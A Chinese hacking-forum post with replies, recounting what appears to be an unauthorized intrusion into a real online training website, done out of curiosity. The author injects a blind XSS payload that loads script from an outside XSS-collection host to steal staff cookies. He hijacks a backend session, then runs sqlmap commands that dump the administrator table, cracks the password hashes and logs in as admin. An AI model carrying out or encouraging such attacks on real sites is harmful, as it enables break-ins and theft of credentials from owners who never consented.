用户
搜索
  • TA的每日心情

    2018-9-1 08:09
  • 签到天数: 39 天

    连续签到: 2 天

    [LV.5]常住居民I

    i春秋作家

    QQ547006660~欢迎交流

    Rank: 7Rank: 7Rank: 7

    18

    主题

    88

    帖子

    5037

    魔法币
    收听
    0
    粉丝
    7
    注册时间
    2017-1-18

    i春秋签约作者春秋文阁楚春秋游侠秦燕魏齐赵

    J0o1ey i春秋作家 QQ547006660~欢迎交流 i春秋签约作者 春秋文阁 楚 春秋游侠 秦 燕 魏 齐 楼主
    发表于 2018-7-18 17:25:08 60727130
    本帖最后由 何为大牛 于 2018-7-18 09:52 编辑

    一、起因
        emmm,炎炎夏日到来,这么个桑拿天干什么好呢?
        记一次以小勃大,紧张刺激的高权重站点渗透测试32.png
        没错,一定要坐在家里,吹着空调,吃着西瓜,然后静静地挖洞。挖洞完叫个外卖,喝着啤酒,撸着烧烤,岂不美哉?然此可为智者道,难为俗人言也。。。正在我沉迷在对夏日的意淫之时,我亲爱的妈妈忽然给我来了一波夺命连环call。

    大概内容如下:
       --妈妈:儿~呀。。。你印布隐私(认不认识)搞公务员培训的机构,帮我在网上瞅瞅去,我有个朋友他儿想考公务员~
       --我:(声音笑嘻嘻,心里mmp)哎呀,这个bia的天,搁家里睡觉行了。。别弄了。。
       --妈妈:MLGB,叫你整,你就快点的,晚上给我回电话。
        哎,父母之命不可违,悲伤的我只能放下手里的键盘和瓜皮,开始去百度上找培训机构。
        记一次以小勃大,紧张刺激的高权重站点渗透测试562.png
       百度上面找了好久,都没找到太合适的。问了问身边的朋友:朋友给了一家网校的报名地址
       http://***.com/3g/***/2203947.htm
        记一次以小勃大,紧张刺激的高权重站点渗透测试872.png
        没错,还带免费试学。。。真的先进。。。。
        然而作为一名做培训的职业小学生,怎么肯轻信这种网校的培训质量?于是打开爱站查了一波权重。。。
        记一次以小勃大,紧张刺激的高权重站点渗透测试1177.png
       这尼玛???百度权6,emmm,有点意思。见到这么高权重的站,那时我已饥渴难耐,便决定对此站点来一波渗透测试。            


    二、XSS盲打?安排一下
           记一次以小勃大,紧张刺激的高权重站点渗透测试1490.png
       看到这里,小伙伴们肯定想。。。emm,是不是可以XSS打一下试试呢?(所谓盲打说白了就是在不知道输入的信息在后台的输出位置的情况下使用XSS利用代码进行渗透测试   说干咱就干。。。接下来就插入xss payload试试吧。。。
       Payload: </textarea><script src="="http://xsspt.com/z6ocdy?1531815744"></script>
       将payload完整黏贴进去,如图发现仅有</tex    这四个字符
        记一次以小勃大,紧张刺激的高权重站点渗透测试1966.png
      审查元素看下,在表单处理上设置了maxlength,直接审查元素大法改掉就好了
        记一次以小勃大,紧张刺激的高权重站点渗透测试2236.png
       把maxlength编辑为999
       记一次以小勃大,紧张刺激的高权重站点渗透测试2482.png
         然后我们的XSS Payload就可以正常地全部输入到表单中了

                   psb.png
         手机那个文本框,我随便填了11位数字,然后点击提交,万幸的的是提交成功了(后端没对内容进行验证)
         过了大概1个小时,突然XSS平台的邮件来了,兴奋ing。。。(客服是真的敬业)
        记一次以小勃大,紧张刺激的高权重站点渗透测试3058.png
        拿着cookie,傻啦吧唧地就是进入后台一波浏览,发现权限非常小,基本上只能处理处理客服工作
        记一次以小勃大,紧张刺激的高权重站点渗透测试3335.png
        不过可以查看后台的管理员账号。。。。。(果然是个大站,后台分工权限这么讲究。。。)
        记一次以小勃大,紧张刺激的高权重站点渗透测试3605.png
           记一次以小勃大,紧张刺激的高权重站点渗透测试3836.png
         看着这么多的超级管理员账号,而我却只是个吊毛客服,基本上没什么权限,心里真的难受的一批。。
         难道我们的渗透到这里就要结束??不可能,这显然不符合本屌的风格。。。
          记一次以小勃大,紧张刺激的高权重站点渗透测试4151.png
         于是我又仔细地翻了翻后台,看看有没有地方可以来一波骚操作。。。

    三、后台SQL注入?讲究
           记一次以小勃大,紧张刺激的高权重站点渗透测试4426.png
          大家可以看到我们的客服处理界面是可以进行查询的,查询的过程是通过GET方式传导一个mobile参数实现查询
    我们直接测试一下SQL注入的Payload,看看是否存在注入。发现页面没有返回信息,那么就很有可能存在SQL注入。
           记一次以小勃大,紧张刺激的高权重站点渗透测试4766.png
         我们使用BurpSuite来抓取本出的的HTTP请求,然后保存在C:\Users\Samsung 700Z5C\Desktop\1.txt中
        记一次以小勃大,紧张刺激的高权重站点渗透测试5066.png
       接下来到了以小勃大,紧张刺激的时刻,使用SQLMAP的 -r参数,注入本HTTP请求
       命令为sqlmap -r C:\Users\Samsung 700Z5C\Desktop\1.txt
        记一次以小勃大,紧张刺激的高权重站点渗透测试5389.png
        wow,wow~注入成功了。哈哈哈。。。。我们开始直奔管理员的表
        命令为sqlmap -r C:\Users\Samsung 700Z5C\Desktop\1.txt --tables -D "nd_net"      //列出nd_net数据库的表
        记一次以小勃大,紧张刺激的高权重站点渗透测试5744.png
       然后执行
       sqlmap -r C:\Users\Samsung 700Z5C\Desktop\1.txt --columns -T "net_admin_user" -D "nd_net"   //列出net_admin_user表的字段
        记一次以小勃大,紧张刺激的高权重站点渗透测试6089.png
        最后执行命令
        sqlmap.py -r "I:\T00l\1.txt" --dump -C "id,nd_user,userid,nd_pass" -T "net_admin_user" -D "nd_net" --threads=10   
       //导出net_admin_user表中id,nd_user,userid,nd_pass几个字段的数据
        记一次以小勃大,紧张刺激的高权重站点渗透测试6490.png
        全部是md5加密,拿到cmd5,一波解密,成功获取到所有管理员的账号密码,然后成功登陆以管理员的权限登陆后台
        记一次以小勃大,紧张刺激的高权重站点渗透测试6778.png
        哈哈,讲究!

        四、不拿Shell,与咸鱼有什么区别?
    游客,如果您要查看本帖隐藏内容请回复


    六、一点想法
          虽然说每次写这种文章都有点疲惫,但是想到能与大家分享技术,共同进步,心里总有一团火焰在燃烧,感谢那些陪着我走过这么多路的朋友,让我拥有了这样永不磨灭的激情
          本人也是一个小菜,文章如果有问题,欢迎大家及时指正!
          PS.大家也可以支持一下我汉化的代码审计工具RIPS(其实我只想坑一波魔法币)                链接:https://bbs.ichunqiu.com/thread-42115-1-1.html
           u=2378044464,1076829778&amp;fm=27&amp;gp=0.jpg









    有培训需求或是技术交流需求的朋友可以联系我~QQ547006660
    好想给你一堆六,但是似乎ichuqiu杜绝这种方式,所以水水的回复一下好想给你一堆六,但是似乎ichuqiu杜绝这种方式,所以水水的回复一下好想给你一堆六,但是似乎ichuqiu杜绝这种方式,所以水水好想给你一堆六,但是似乎ichuqiu杜绝这种方式,所以水水的回复一下好想给你一堆六,但是似乎ichuqiu杜绝这种方式,所以水水的回复一下好想给你一堆六,但是似乎ichuqiu杜绝这种方式,所以水水的回复一下好想给你一堆六,但是似乎ichuqiu杜绝这种方式,所以水水的回复一下的回复一下好想给你一堆六,但是似乎ichuqiu杜绝这种方式,所以水水的回复一下
    使用道具 评分 举报 回复好想给你一堆六,但是似乎ichuqiu杜绝这种方式,所以水水的回复一下好想给你一堆六,但是似乎ichuqiu杜绝这种方式,所以水水的回复一下好想给你一堆六,但是似
    使用道具 举报 回复
    好想给你一堆六,但是似乎ichuqiu杜绝这种方式,所以水水的回复一下好想给你一堆六,但是似乎ichuqiu杜绝这种方式,所以水水的回复一下好想给你一堆六,但是似乎ichuqiu杜绝这种方式,所以水水好想给你一堆六,但是似乎ichuqiu杜绝这种方式,所以水水的回复一下好想给你一堆六,但是似乎ichuqiu杜绝这种方式,所以水水的回复一下好想给你一堆六,但是似乎ichuqiu杜绝这种方式,所以水水的回复一下好想给你一堆六,但是似乎ichuqiu杜绝这种方式,所以水水的回复一下的回复一下好想给你一堆六,但是似乎ichuqiu杜绝这种方式,所以水水的回复一下
    使用道具 评分 举报 回复好想给你一堆六,但是似乎ichuqiu杜绝这种方式,所以水水的回复一下好想给你一堆六,但是似乎ichuqiu杜绝这种方式,所以水水的回复一下好想给你一堆六,但是似
    使用道具 举报 回复
    好想给你一堆六,但是似乎ichuqiu杜绝这种方式,所以水水的回复一下好想给你一堆六,但是似乎ichuqiu杜绝这种方式,所以水水的回复一下好想给你一堆六,但是似乎ichuqiu杜绝这种方式,所以水水好想给你一堆六,但是似乎ichuqiu杜绝这种方式,所以水水的回复一下好想给你一堆六,但是似乎ichuqiu杜绝这种方式,所以水水的回复一下好想给你一堆六,但是似乎ichuqiu杜绝这种方式,所以水水的回复一下好想给你一堆六,但是似乎ichuqiu杜绝这种方式,所以水水的回复一下的回复一下好想给你一堆六,但是似乎ichuqiu杜绝这种方式,所以水水的回复一下
    使用道具 评分 举报 回复好想给你一堆六,但是似乎ichuqiu杜绝这种方式,所以水水的回复一下好想给你一堆六,但是似乎ichuqiu杜绝这种方式,所以水水的回复一下好想给你一堆六,但是似
    使用道具 举报 回复
    好想给你一堆六,但是似乎ichuqiu杜绝这种方式,所以水水的回复一下好想给你一堆六,但是似乎ichuqiu杜绝这种方式,所以水水的回复一下好想给你一堆六,但是似乎ichuqiu杜绝这种方式,所以水水好想给你一堆六,但是似乎ichuqiu杜绝这种方式,所以水水的回复一下好想给你一堆六,但是似乎ichuqiu杜绝这种方式,所以水水的回复一下好想给你一堆六,但是似乎ichuqiu杜绝这种方式,所以水水的回复一下好想给你一堆六,但是似乎ichuqiu杜绝这种方式,所以水水的回复一下的回复一下好想给你一堆六,但是似乎ichuqiu杜绝这种方式,所以水水的回复一下
    使用道具 评分 举报 回复好想给你一堆六,但是似乎ichuqiu杜绝这种方式,所以水水的回复一下好想给你一堆六,但是似乎ichuqiu杜绝这种方式,所以水水的回复一下好想给你一堆六,但是似
    使用道具 举报 回复
    好想给你一堆六,但是似乎ichuqiu杜绝这种方式,所以水水的回复一下好想给你一堆六,但是似乎ichuqiu杜绝这种方式,所以水水的回复一下好想给你一堆六,但是似乎ichuqiu杜绝这种方式,所以水水好想给你一堆六,但是似乎ichuqiu杜绝这种方式,所以水水的回复一下好想给你一堆六,但是似乎ichuqiu杜绝这种方式,所以水水的回复一下好想给你一堆六,但是似乎ichuqiu杜绝这种方式,所以水水的回复一下好想给你一堆六,但是似乎ichuqiu杜绝这种方式,所以水水的回复一下的回复一下好想给你一堆六,但是似乎ichuqiu杜绝这种方式,所以水水的回复一下
    使用道具 评分 举报 回复好想给你一堆六,但是似乎ichuqiu杜绝这种方式,所以水水的回复一下好想给你一堆六,但是似乎ichuqiu杜绝这种方式,所以水水的回复一下好想给你一堆六,但是似
    使用道具 举报 回复

    好想给你一堆六,但是似乎ichuqiu杜绝这种方式,所以水水的回复一下好想给你一堆六,但是似乎ichuqiu杜绝这种方式,所以水水的回复一下好想给你一堆六,但是似乎ichuqiu杜绝这种方式,所以水水好想给你一堆六,但是似乎ichuqiu杜绝这种方式,所以水水的回复一下好想给你一堆六,但是似乎ichuqiu杜绝这种方式,所以水水的回复一下好想给你一堆六,但是似乎ichuqiu杜绝这种方式,所以水水的回复一下好想给你一堆六,但是似乎ichuqiu杜绝这种方式,所以水水的回复一下的回复一下好想给你一堆六,但是似乎ichuqiu杜绝这种方式,所以水水的回复一下
    使用道具 评分 举报 回复好想给你一堆六,但是似乎ichuqiu杜绝这种方式,所以水水的回复一下好想给你一堆六,但是似乎ichuqiu杜绝这种方式,所以水水的回复一下好想给你一堆六,但是似
    使用道具 举报 回复
    好想给你一堆六,但是似乎ichuqiu杜绝这种方式,所以水水的回复一下好想给你一堆六,但是似乎ichuqiu杜绝这种方式,所以水水的回复一下好想给你一堆六,但是似乎ichuqiu杜绝这种方式,所以水水好想给你一堆六,但是似乎ichuqiu杜绝这种方式,所以水水的回复一下好想给你一堆六,但是似乎ichuqiu杜绝这种方式,所以水水的回复一下好想给你一堆六,但是似乎ichuqiu杜绝这种方式,所以水水的回复一下好想给你一堆六,但是似乎ichuqiu杜绝这种方式,所以水水的回复一下的回复一下好想给你一堆六,但是似乎ichuqiu杜绝这种方式,所以水水的回复一下
    使用道具 评分 举报 回复好想给你一堆六,但是似乎ichuqiu杜绝这种方式,所以水水的回复一下好想给你一堆六,但是似乎ichuqiu杜绝这种方式,所以水水的回复一下好想给你一堆六,但是似
    使用道具 举报 回复
    好想给你一堆六,但是似乎ichuqiu杜绝这种方式,所以水水的回复一下好想给你一堆六,但是似乎ichuqiu杜绝这种方式,所以水水的回复一下好想给你一堆六,但是似乎ichuqiu杜绝这种方式,所以水水好想给你一堆六,但是似乎ichuqiu杜绝这种方式,所以水水的回复一下好想给你一堆六,但是似乎ichuqiu杜绝这种方式,所以水水的回复一下好想给你一堆六,但是似乎ichuqiu杜绝这种方式,所以水水的回复一下好想给你一堆六,但是似乎ichuqiu杜绝这种方式,所以水水的回复一下的回复一下好想给你一堆六,但是似乎ichuqiu杜绝这种方式,所以水水的回复一下
    使用道具 评分 举报 回复好想给你一堆六,但是似乎ichuqiu杜绝这种方式,所以水水的回复一下好想给你一堆六,但是似乎ichuqiu杜绝这种方式,所以水水的回复一下好想给你一堆六,但是似
    使用道具 举报 回复
    J0o1ey i春秋作家 QQ547006660~欢迎交流 i春秋签约作者 春秋文阁 楚 春秋游侠 秦 燕 魏 齐
    9#
    发表于 2018-7-18 17:39:54
    PS:因为自己用编辑器的能力,实在有限,这篇文章发了三遍才完成,哈哈,各位老铁可以支持下
    有培训需求或是技术交流需求的朋友可以联系我~QQ547006660
    使用道具 举报 回复
    发表于 2018-7-18 18:01:53
    蒂花之秀
    使用道具 举报 回复
    发表于 2018-7-18 18:05:29
    为啥用</textarea>标签
    使用道具 举报 回复
    发表于 2018-7-18 18:17:51
    学习涨姿势
    使用道具 举报 回复
    发表于 2018-7-18 18:18:17
    然后表哥就被抓了
    嗨呀
    皮一下很开心
    使用道具 举报 回复
    发表于 2018-7-18 18:18:34
    别人免费试学怎么了,你居然拿shell
    使用道具 举报 回复
    谢谢分享
    使用道具 举报 回复
    发表于 2018-7-18 18:38:54
    66666666666666666666666666
    使用道具 举报 回复
    发表于 2018-7-18 19:21:12
    欧98k
    使用道具 举报 回复
    发表于 2018-7-18 19:37:55
    秀呀 老哥
    使用道具 举报 回复
    发表于 2018-7-18 19:58:12
    排面排面
    使用道具 举报 回复
    哇,越看越过瘾,回复来看看剩下的
    使用道具 举报 回复
    666666666666666
    使用道具 举报 回复
    图都压缩了?点开也是小图
    使用道具 举报 回复
    您需要登录后才可以回帖 登录 | 立即注册